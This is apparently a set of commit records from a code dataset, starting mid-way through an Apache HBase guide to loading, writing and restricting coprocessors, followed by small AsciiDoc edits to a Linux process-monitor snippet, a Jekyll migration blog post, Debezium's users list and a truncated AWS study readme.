HBase. This may seem\npreferable to static loading, but dynamically loaded coprocessors are loaded on a\nper-table basis, and are only available to the table for which they were loaded. For\nthis reason, dynamically loaded tables are sometimes called *Table Coprocessor*.\n\nIn addition, dynamically loading a coprocessor acts as a schema change on the table,\nand the table must be taken offline to load the coprocessor.\n\nThere are three ways to dynamically load Coprocessor.\n\n[NOTE]\n.Assumptions\n====\nThe below mentioned instructions makes the following assumptions:\n\n* A JAR called `coprocessor.jar` contains the Coprocessor implementation along with all of its\ndependencies.\n* The JAR is available in HDFS in some location like\n`hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar`.\n====\n\n[[load_coprocessor_in_shell]]\n==== Using HBase Shell\n\n. Load the Coprocessor, using a command like the following:\n+\n[source]\n----\nhbase alter 'users', METHOD => 'table_att', 'Coprocessor'=>'hdfs:\/\/<namenode>:<port>\/\nuser\/<hadoop-user>\/coprocessor.jar| org.myname.hbase.Coprocessor.RegionObserverExample|1073741823|\narg1=1,arg2=2'\n----\n+\nThe Coprocessor framework will try to read the class information from the coprocessor table\nattribute value.\nThe value contains four pieces of information which are separated by the pipe (`|`) character.\n+\n* File path: The jar file containing the Coprocessor implementation must be in a location where\nall region servers can read it. +\nYou could copy the file onto the local disk on each region server, but it is recommended to store\nit in HDFS. +\nhttps:\/\/issues.apache.org\/jira\/browse\/HBASE-14548[HBASE-14548] allows a directory containing the jars\nor some wildcards to be specified, such as: hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/ or\nhdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/*.jar. Please note that if a directory is specified,\nall jar files(.jar) in the directory are added. It does not search for files in sub-directories.\nDo not use a wildcard if you would like to specify a directory. This enhancement applies to the\nusage via the JAVA API as well.\n* Class name: The full class name of the Coprocessor.\n* Priority: An integer. The framework will determine the execution sequence of all configured\nobservers registered at the same hook using priorities. This field can be left blank. In that\ncase the framework will assign a default priority value.\n* Arguments (Optional): This field is passed to the Coprocessor implementation. This is optional.\n\n. Verify that the coprocessor loaded:\n+\n----\nhbase(main):04:0> describe 'users'\n----\n+\nThe coprocessor should be listed in the `TABLE_ATTRIBUTES`.\n\n==== Using the Java API (all HBase versions)\n\nThe following Java code shows how to use the `setValue()` method of `HTableDescriptor`\nto load a coprocessor on the `users` table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.setValue(\"COPROCESSOR$1\", path + \"|\"\n+ RegionObserverExample.class.getCanonicalName() + \"|\"\n+ Coprocessor.PRIORITY_USER);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\n==== Using the Java API (HBase 0.96+ only)\n\nIn HBase 0.96 and newer, the `addCoprocessor()` method of `HTableDescriptor` provides\nan easier way to load a coprocessor dynamically.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nPath path = new Path(\"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\");\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.addCoprocessor(RegionObserverExample.class.getCanonicalName(), path,\nCoprocessor.PRIORITY_USER, null);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nWARNING: There is no guarantee that the framework will load a given Coprocessor successfully.\nFor example, the shell command neither guarantees a jar file exists at a particular location nor\nverifies whether the given class is actually contained in the jar file.\n\n\n=== Dynamic Unloading\n\n==== Using HBase Shell\n\n. Alter the table to remove the coprocessor.\n+\n[source]\n----\nhbase> alter 'users', METHOD => 'table_att_unset', NAME => 'coprocessor$1'\n----\n\n==== Using the Java API\n\nReload the table definition without setting the value of the coprocessor either by\nusing `setValue()` or `addCoprocessor()` methods. This will remove any coprocessor\nattached to the table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nIn HBase 0.96 and newer, you can instead use the `removeCoprocessor()` method of the\n`HTableDescriptor` class.\n\n\n[[cp_example]]\n== Examples\nHBase ships examples for Observer Coprocessor.\n\nA more detailed example is given below.\n\nThese examples assume a table called `users`, which has two column families `personalDet`\nand `salaryDet`, containing personal and salary details. Below is the graphical representation\nof the `users` table.\n\n.Users Table\n[width=\"100%\",cols=\"7\",options=\"header,footer\"]\n|====================\n| 3+|personalDet 3+|salaryDet\n|*rowkey* |*name* |*lastname* |*dob* |*gross* |*net* |*allowances*\n|admin |Admin |Admin | 3+|\n|cdickens |Charles |Dickens |02\/07\/1812 |10000 |8000 |2000\n|jverne |Jules |Verne |02\/08\/1828 |12000 |9000 |3000\n|====================\n\n\n=== Observer Example\n\nThe following Observer coprocessor prevents the details of the user `admin` from being\nreturned in a `Get` or `Scan` of the `users` table.\n\n. Write a class that implements the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionCoprocessor.html[RegionCoprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver]\nclass.\n\n. Override the `preGetOp()` method (the `preGet()` method is deprecated) to check\nwhether the client has queried for the rowkey with value `admin`. If so, return an\nempty result. Otherwise, process the request as normal.\n\n. Put your code and dependencies in a JAR file.\n\n. Place the JAR in HDFS where HBase can locate it.\n\n. Load the Coprocessor.\n\n. Write a simple program to test it.\n\nFollowing are the implementation of the above steps:\n\n[source,java]\n----\npublic class RegionObserverExample implements RegionCoprocessor, RegionObserver {\n\n private static final byte[] ADMIN = Bytes.toBytes(\"admin\");\n private static final byte[] COLUMN_FAMILY = Bytes.toBytes(\"details\");\n private static final byte[] COLUMN = Bytes.toBytes(\"Admin_det\");\n private static final byte[] VALUE = Bytes.toBytes(\"You can't see Admin details\");\n\n @Override\n public Optional<RegionObserver> getRegionObserver() {\n return Optional.of(this);\n }\n\n @Override\n public void preGetOp(final ObserverContext<RegionCoprocessorEnvironment> e, final Get get, final List<Cell> results)\n throws IOException {\n\n if (Bytes.equals(get.getRow(),ADMIN)) {\n Cell c = CellUtil.createCell(get.getRow(),COLUMN_FAMILY, COLUMN,\n System.currentTimeMillis(), (byte)4, VALUE);\n results.add(c);\n e.bypass();\n }\n }\n}\n----\n\nOverriding the `preGetOp()` will only work for `Get` operations. You also need to override\nthe `preScannerOpen()` method to filter the `admin` row from scan results.\n\n[source,java]\n----\n@Override\npublic RegionScanner preScannerOpen(final ObserverContext<RegionCoprocessorEnvironment> e, final Scan scan,\nfinal RegionScanner s) throws IOException {\n\n Filter filter = new RowFilter(CompareOp.NOT_EQUAL, new BinaryComparator(ADMIN));\n scan.setFilter(filter);\n return s;\n}\n----\n\nThis method works but there is a _side effect_. If the client has used a filter in\nits scan, that filter will be replaced by this filter. Instead, you can explicitly\nremove any `admin` results from the scan:\n\n[source,java]\n----\n@Override\npublic boolean postScannerNext(final ObserverContext<RegionCoprocessorEnvironment> e, final InternalScanner s,\nfinal List<Result> results, final int limit, final boolean hasMore) throws IOException {\n\tResult result = null;\n Iterator<Result> iterator = results.iterator();\n while (iterator.hasNext()) {\n result = iterator.next();\n if (Bytes.equals(result.getRow(), ROWKEY)) {\n iterator.remove();\n break;\n }\n }\n return hasMore;\n}\n----\n\n=== Endpoint Example\n\nStill using the `users` table, this example implements a coprocessor to calculate\nthe sum of all employee salaries, using an endpoint coprocessor.\n\n. Create a '.proto' file defining your service.\n+\n[source]\n----\noption java_package = \"org.myname.hbase.coprocessor.autogenerated\";\noption java_outer_classname = \"Sum\";\noption java_generic_services = true;\noption java_generate_equals_and_hash = true;\noption optimize_for = SPEED;\nmessage SumRequest {\n required string family = 1;\n required string column = 2;\n}\n\nmessage SumResponse {\n required int64 sum = 1 [default = 0];\n}\n\nservice SumService {\n rpc getSum(SumRequest)\n returns (SumResponse);\n}\n----\n\n. Execute the `protoc` command to generate the Java code from the above .proto' file.\n+\n[source]\n----\n$ mkdir src\n$ protoc --java_out=src .\/sum.proto\n----\n+\nThis will generate a class call `Sum.java`.\n\n. Write a class that extends the generated service class, implement the `Coprocessor`\nand `CoprocessorService` classes, and override the service method.\n+\nWARNING: If you load a coprocessor from `hbase-site.xml` and then load the same coprocessor\nagain using HBase Shell, it will be loaded a second time. The same class will\nexist twice, and the second instance will have a higher ID (and thus a lower priority).\nThe effect is that the duplicate coprocessor is effectively ignored.\n+\n[source, java]\n----\npublic class SumEndPoint extends Sum.SumService implements Coprocessor, CoprocessorService {\n\n private RegionCoprocessorEnvironment env;\n\n @Override\n public Service getService() {\n return this;\n }\n\n @Override\n public void start(CoprocessorEnvironment env) throws IOException {\n if (env instanceof RegionCoprocessorEnvironment) {\n this.env = (RegionCoprocessorEnvironment)env;\n } else {\n throw new CoprocessorException(\"Must be loaded on a table region!\");\n }\n }\n\n @Override\n public void stop(CoprocessorEnvironment env) throws IOException {\n \/\/ do nothing\n }\n\n @Override\n public void getSum(RpcController controller, Sum.SumRequest request, RpcCallback<Sum.SumResponse> done) {\n Scan scan = new Scan();\n scan.addFamily(Bytes.toBytes(request.getFamily()));\n scan.addColumn(Bytes.toBytes(request.getFamily()), Bytes.toBytes(request.getColumn()));\n\n Sum.SumResponse response = null;\n InternalScanner scanner = null;\n\n try {\n scanner = env.getRegion().getScanner(scan);\n List<Cell> results = new ArrayList<>();\n boolean hasMore = false;\n long sum = 0L;\n\n do {\n hasMore = scanner.next(results);\n for (Cell cell : results) {\n sum = sum + Bytes.toLong(CellUtil.cloneValue(cell));\n }\n results.clear();\n } while (hasMore);\n\n response = Sum.SumResponse.newBuilder().setSum(sum).build();\n } catch (IOException ioe) {\n ResponseConverter.setControllerException(controller, ioe);\n } finally {\n if (scanner != null) {\n try {\n scanner.close();\n } catch (IOException ignored) {}\n }\n }\n\n done.run(response);\n }\n}\n----\n+\n[source, java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nfinal Sum.SumRequest request = Sum.SumRequest.newBuilder().setFamily(\"salaryDet\").setColumn(\"gross\").build();\ntry {\n Map<byte[], Long> results = table.coprocessorService(\n Sum.SumService.class,\n null, \/* start key *\/\n null, \/* end key *\/\n new Batch.Call<Sum.SumService, Long>() {\n @Override\n public Long call(Sum.SumService aggregate) throws IOException {\n BlockingRpcCallback<Sum.SumResponse> rpcCallback = new BlockingRpcCallback<>();\n aggregate.getSum(null, request, rpcCallback);\n Sum.SumResponse response = rpcCallback.get();\n\n return response.hasSum() ? response.getSum() : 0L;\n }\n }\n );\n\n for (Long sum : results.values()) {\n System.out.println(\"Sum = \" + sum);\n }\n} catch (ServiceException e) {\n e.printStackTrace();\n} catch (Throwable e) {\n e.printStackTrace();\n}\n----\n\n. Load the Coprocessor.\n\n. Write a client code to call the Coprocessor.\n\n\n== Guidelines For Deploying A Coprocessor\n\nBundling Coprocessors::\n You can bundle all classes for a coprocessor into a\n single JAR on the RegionServer's classpath, for easy deployment. Otherwise,\n place all dependencies on the RegionServer's classpath so that they can be\n loaded during RegionServer start-up. The classpath for a RegionServer is set\n in the RegionServer's `hbase-env.sh` file.\nAutomating Deployment::\n You can use a tool such as Puppet, Chef, or\n Ansible to ship the JAR for the coprocessor to the required location on your\n RegionServers' filesystems and restart each RegionServer, to automate\n coprocessor deployment. Details for such set-ups are out of scope of this\n document.\nUpdating a Coprocessor::\n Deploying a new version of a given coprocessor is not as simple as disabling it,\n replacing the JAR, and re-enabling the coprocessor. This is because you cannot\n reload a class in a JVM unless you delete all the current references to it.\n Since the current JVM has reference to the existing coprocessor, you must restart\n the JVM, by restarting the RegionServer, in order to replace it. This behavior\n is not expected to change.\nCoprocessor Logging::\n The Coprocessor framework does not provide an API for logging beyond standard Java\n logging.\nCoprocessor Configuration::\n If you do not want to load coprocessors from the HBase Shell, you can add their configuration\n properties to `hbase-site.xml`. In <<load_coprocessor_in_shell>>, two arguments are\n set: `arg1=1,arg2=2`. These could have been added to `hbase-site.xml` as follows:\n[source,xml]\n----\n<property>\n <name>arg1<\/name>\n <value>1<\/value>\n<\/property>\n<property>\n <name>arg2<\/name>\n <value>2<\/value>\n<\/property>\n----\nThen you can read the configuration using code like the following:\n[source,java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nGet get = new Get(Bytes.toBytes(\"admin\"));\nResult result = table.get(get);\nfor (Cell c : result.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \"==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \"{\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c)) + \"}\");\n}\nScan scan = new Scan();\nResultScanner scanner = table.getScanner(scan);\nfor (Result res : scanner) {\n for (Cell c : res.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \" ==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \" {\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c))\n + \"}\");\n }\n}\n----\n\n== Restricting Coprocessor Usage\n\nRestricting arbitrary user coprocessors can be a big concern in multitenant environments. HBase provides a continuum of options for ensuring only expected coprocessors are running:\n\n- `hbase.coprocessor.enabled`: Enables or disables all coprocessors. This will limit the functionality of HBase, as disabling all coprocessors will disable some security providers. An example coproccessor so affected is `org.apache.hadoop.hbase.security.access.AccessController`.\n* `hbase.coprocessor.user.enabled`: Enables or disables loading coprocessors on tables (i.e. user coprocessors).\n* One can statically load coprocessors, and optionally tune their priorities, via the following tunables in `hbase-site.xml`:\n** `hbase.coprocessor.regionserver.classes`: A comma-separated list of coprocessors that are loaded by region servers\n** `hbase.coprocessor.region.classes`: A comma-separated list of RegionObserver and Endpoint coprocessors\n** `hbase.coprocessor.user.region.classes`: A comma-separated list of coprocessors that are loaded by all regions\n** `hbase.coprocessor.master.classes`: A comma-separated list of coprocessors that are loaded by the master (MasterObserver coprocessors)\n** `hbase.coprocessor.wal.classes`: A comma-separated list of WALObserver coprocessors to load\n* `hbase.coprocessor.abortonerror`: Whether to abort the daemon which has loaded the coprocessor if the coprocessor should error other than `IOError`. If this is set to false and an access controller coprocessor should have a fatal error the coprocessor will be circumvented, as such in secure installations this is advised to be `true`; however, one may override this on a per-table basis for user coprocessors, to ensure they do not abort their running region server and are instead unloaded on error.\n* `hbase.coprocessor.region.whitelist.paths`: A comma separated list available for those loading `org.apache.hadoop.hbase.security.access.CoprocessorWhitelistMasterObserver` whereby one can use the following options to white-list paths from which coprocessors may be loaded.\n** Coprocessors on the classpath are implicitly white-listed\n** `*` to wildcard all coprocessor paths\n** An entire filesystem (e.g. `hdfs:\/\/my-cluster\/`)\n** A wildcard path to be evaluated by link:https:\/\/commons.apache.org\/proper\/commons-io\/javadocs\/api-release\/org\/apache\/commons\/io\/FilenameUtils.html[FilenameUtils.wildcardMatch]\n** Note: Path can specify scheme or not (e.g. `file:\/\/\/usr\/hbase\/lib\/coprocessors` or for all filesystems `\/usr\/hbase\/lib\/coprocessors`)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d6858f17a8364c2f61f6e65843d177d07e0b145","subject":"Update 2015-12-13-Linux-Process-Monitor.adoc","message":"Update 2015-12-13-Linux-Process-Monitor.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-13-Linux-Process-Monitor.adoc","new_file":"_posts\/2015-12-13-Linux-Process-Monitor.adoc","new_contents":"= Linux Process Monitor\n\n=== Use watch to monitor process bar every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'bar'; then exit 0; else exit 1; fi'\n----","old_contents":"= Linux Process Monitor\n\n== Use watch to monitor process bar every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'bar'; then exit 0; else exit 1; fi'\n----","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c4149a22bd19309b32ed10d91c6a58d76e5fdc70","subject":"Changing subtitle","message":"Changing subtitle\n","repos":"mikrethor\/blog,mikrethor\/blog,mikrethor\/blog","old_file":"_posts\/2020-08-02-Moving-blog-to-Jekyll.adoc","new_file":"_posts\/2020-08-02-Moving-blog-to-Jekyll.adoc","new_contents":"= Moving my blog to Jekyll\n:showtitle:\n\/\/:page-excerpt: Excerpt goes here.\n\/\/:page-root: ..\/..\/..\/\n:date: 2020-08-02 23:45:13 -0400\n:layout: post\n\/\/:title: Man must explore, r sand this is exploration at its greatest\n:page-subtitle: \"Why moving away from Hubpress\"\n:page-background: \/img\/posts\/2020-08-02-Jekyll.png\n\n== Why moving away from Hubpress\n\nA few weeks ago, I decided to move my blog from Hubpress to something else.\nIndeed, Hubpress is not maintained anymore and I wanted someting close enough to want I had.\nMeaning, asciidoc (or markdown) based, publishable easily on Github Pages and with the possibility to get feedback from my audience (who knows ?).\n\n== Solution considered\n\nAfter a few minutes on the web, I decided to look more into https:\/\/gohugo.io[Hugo] and https:\/\/jekyllrb.com[Jekyll].\n\n=== Hugo\n\nHugo is written in Go and is a static website generator.\nIt's possible to use Asciidoc or Markdown and it seems to be able to use Disqus which is the comment solution I already used with Hubpress.\n\n=== Jekyll\n\nI already use Jekyll because it's the solution we use for the https:\/\/www.montreal-jug.org[Montreal Jug Website].\nSame as Hugo, Jekyll is a static website generator. It's possible to use Asciidoc or Markdown and Disqus.\nInstead of Hugo, it's written in Ruby.\n\n=== JBake\n\nFor the ones considering JBake, I moved from https:\/\/www.montreal-jug.org[JBake] a long time ago as you can read in my link:..\/..\/..\/2017\/10\/29\/From-J-Bke-to-Hubpress.html[post] on that.\n\n=== Decision\n\nI decided to go with Jekyll as I am already familiar with it and I don't care about performance.\nThe ones who do should consider Hugo.\n\n== Theme\n\nI did some research on the web to start with a pre-existing theme and I went with https:\/\/startbootstrap.com\/themes\/clean-blog-jekyll\/[Clean Blog]\n\n== Commenting\n\nAs I said, I already use Disqus so I didn't want to change.\nI would like a solution where the content doesn't belong to me but at the moment I didn't find any that meets my needs of owning my content.\nI am considering to move away from Disqus at some point for https:\/\/utteranc.es[utterances] that is based on Github Issues but I will be still not owning my content.\n\n== Blog migration\n\nI was already using asciidoc so I copied all my asciidoc files directly to the post folder in Jekyll.\nEverything went smoothly and all the posts where generated to HTML with all the informations needed.\n\nI add to adapt the images path with the new one in some asciidoc files contening pictures but a quick CMD+R helped me to change all the files in a nutshell.\n\nSo I avoided having to develop a batch to process all my asciidoc to migrate but with a lot more content it would have been the solution I would have used.\n\n== Automate the deployment\n\nI had never tried \"Github Actions\" before so I decided to give it a try and it was as easy as following this https:\/\/jekyllrb.com\/docs\/continuous-integration\/github-actions\/[procedure].\n\nI took a few minutes to generate \"et voil\u00e0 !\"\n\nAnd now, because you are reading those lines I guess everything worked fine.\n\n== Conclusion\n\nI miss Hubpress which has a web interface to edit the asciidoc but it's completely replaced by the automating of the deployement to the Github Pages.\n","old_contents":"= Moving my blog to Jekyll\n:showtitle:\n\/\/:page-excerpt: Excerpt goes here.\n\/\/:page-root: ..\/..\/..\/\n:date: 2020-08-02 23:45:13 -0400\n:layout: post\n\/\/:title: Man must explore, r sand this is exploration at its greatest\n:page-subtitle: \"Moving my blog to Jekyll\"\n:page-background: \/img\/posts\/2020-08-02-Jekyll.png\n\n== Why moving away from Hubpress\n\nA few weeks ago, I decided to move my blog from Hubpress to something else.\nIndeed, Hubpress is not maintained anymore and I wanted someting close enough to want I had.\nMeaning, asciidoc (or markdown) based, publishable easily on Github Pages and with the possibility to get feedback from my audience (who knows ?).\n\n== Solution considered\n\nAfter a few minutes on the web, I decided to look more into https:\/\/gohugo.io[Hugo] and https:\/\/jekyllrb.com[Jekyll].\n\n=== Hugo\n\nHugo is written in Go and is a static website generator.\nIt's possible to use Asciidoc or Markdown and it seems to be able to use Disqus which is the comment solution I already used with Hubpress.\n\n=== Jekyll\n\nI already use Jekyll because it's the solution we use for the https:\/\/www.montreal-jug.org[Montreal Jug Website].\nSame as Hugo, Jekyll is a static website generator. It's possible to use Asciidoc or Markdown and Disqus.\nInstead of Hugo, it's written in Ruby.\n\n=== JBake\n\nFor the ones considering JBake, I moved from https:\/\/www.montreal-jug.org[JBake] a long time ago as you can read in my link:..\/..\/..\/2017\/10\/29\/From-J-Bke-to-Hubpress.html[post] on that.\n\n=== Decision\n\nI decided to go with Jekyll as I am already familiar with it and I don't care about performance.\nThe ones who do should consider Hugo.\n\n== Theme\n\nI did some research on the web to start with a pre-existing theme and I went with https:\/\/startbootstrap.com\/themes\/clean-blog-jekyll\/[Clean Blog]\n\n== Commenting\n\nAs I said, I already use Disqus so I didn't want to change.\nI would like a solution where the content doesn't belong to me but at the moment I didn't find any that meets my needs of owning my content.\nI am considering to move away from Disqus at some point for https:\/\/utteranc.es[utterances] that is based on Github Issues but I will be still not owning my content.\n\n== Blog migration\n\nI was already using asciidoc so I copied all my asciidoc files directly to the post folder in Jekyll.\nEverything went smoothly and all the posts where generated to HTML with all the informations needed.\n\nI add to adapt the images path with the new one in some asciidoc files contening pictures but a quick CMD+R helped me to change all the files in a nutshell.\n\nSo I avoided having to develop a batch to process all my asciidoc to migrate but with a lot more content it would have been the solution I would have used.\n\n== Automate the deployment\n\nI had never tried \"Github Actions\" before so I decided to give it a try and it was as easy as following this https:\/\/jekyllrb.com\/docs\/continuous-integration\/github-actions\/[procedure].\n\nI took a few minutes to generate \"et voil\u00e0 !\"\n\nAnd now, because you are reading those lines I guess everything worked fine.\n\n== Conclusion\n\nI miss Hubpress which has a web interface to edit the asciidoc but it's completely replaced by the automating of the deployement to the Github Pages.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"03f5f6e7c8a379ff767636ed27d7889dd15c0d29","subject":"Lendingkart Debizium ","message":"Lendingkart Debizium \n\nLendingkart is one of user of Debizium","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"community\/users.asciidoc","new_file":"community\/users.asciidoc","new_contents":"= Who's Using Debezium?\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium is used in production by a wide range of companies and organizations.\nThis list contains users of Debezium who agreed to serve as public reference;\nwhere available, further resources with more details are linked.\n\nIf your organization would like to be added to (or removed from) this list,\nplease send a pull request for updating the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/community\/users.asciidoc[source of this page].\n\n* Behalf (https:\/\/aws.amazon.com\/blogs\/apn\/how-behalf-met-its-streaming-data-scaling-demands-with-amazon-managed-streaming-for-apache-kafka\/[details])\n* Convoy (https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[details])\n* Experience\n* JW Player (https:\/\/www.slideshare.net\/jwplayer\/polylog-a-logbased-architecture-for-distributed-systems-124997666[details])\n* Kenshoo\n* Lendingkart Tech\n* OYO\n* Pipedrive\n* Segment (used with https:\/\/ctlstore.segment.com\/[ctlstore])\n* Synaltic (https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019[details in french])\n* Traveloka\n* Usabilla by Surveymonkey\n* WePay, Inc. (https:\/\/wecode.wepay.com\/posts\/streaming-databases-in-realtime-with-mysql-debezium-kafka[details], https:\/\/wecode.wepay.com\/posts\/streaming-cassandra-at-wepay-part-1[more details])\n* ... and you? Then let us know and get added to the list, too. Thanks!\n","old_contents":"= Who's Using Debezium?\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium is used in production by a wide range of companies and organizations.\nThis list contains users of Debezium who agreed to serve as public reference;\nwhere available, further resources with more details are linked.\n\nIf your organization would like to be added to (or removed from) this list,\nplease send a pull request for updating the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/community\/users.asciidoc[source of this page].\n\n* Behalf (https:\/\/aws.amazon.com\/blogs\/apn\/how-behalf-met-its-streaming-data-scaling-demands-with-amazon-managed-streaming-for-apache-kafka\/[details])\n* Convoy (https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[details])\n* Experience\n* JW Player (https:\/\/www.slideshare.net\/jwplayer\/polylog-a-logbased-architecture-for-distributed-systems-124997666[details])\n* Kenshoo\n* OYO\n* Pipedrive\n* Segment (used with https:\/\/ctlstore.segment.com\/[ctlstore])\n* Synaltic (https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019[details in french])\n* Traveloka\n* Usabilla by Surveymonkey\n* WePay, Inc. (https:\/\/wecode.wepay.com\/posts\/streaming-databases-in-realtime-with-mysql-debezium-kafka[details], https:\/\/wecode.wepay.com\/posts\/streaming-cassandra-at-wepay-part-1[more details])\n* ... and you? Then let us know and get added to the list, too. Thanks!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2fb3e7828f3bc8fceef71fc5af42e70d4d76104","subject":"201802030747","message":"201802030747\n","repos":"bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house","old_file":"fiddles\/aws\/readme.adoc","new_file":"fiddles\/aws\/readme.adoc","new_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life, cost nearly 80K. In hind sight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--time to make-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures on link:http:\/\/acloud.guru[acloud.guru].\n\n\n== Lecture Notes\n\n=== Intro\n1. link:overview.md[10,000 Foot Overview]\n2. link:dont-freakout.md[Don't Freakout]\n\n=== IAM\n1. link:iam.md[IAM 101]\n2. link:billing-alarm.md[Creating a Billing Alarm]\n\n=== S3\n1. link:s3.md[S3 101]\n","old_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life, cost nearly 80K. In hind sight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--time to make-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures on link:http:\/\/acloud.guru[acloud.guru].\n\n\n== Lecture Notes\n\n=== Intro\n#### link:overview.md[10,000 Foot Overview]\n#### link:dont-freakout.md[Don't Freakout]\n\n=== IAM\n#### link:iam.md[IAM 101]\n#### link:billing-alarm.md[Creating a Billing Alarm]\n\n=== S3\n#### link:s3.md[S3 101]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c726822f3f2cd15d9e0b80adac92ef45105aacce","subject":"201803030925","message":"201803030925\n","repos":"bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house","old_file":"fiddles\/aws\/readme.adoc","new_file":"fiddles\/aws\/readme.adoc","new_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life and cost over 80K. In hindsight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--making-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures\/labs on link:http:\/\/acloud.guru[acloud.guru]. Note, aside from purchasing the\n`AWS Certified Solutions Architect - Associate` course on cloud guru, all of my studies have been\ndone using an 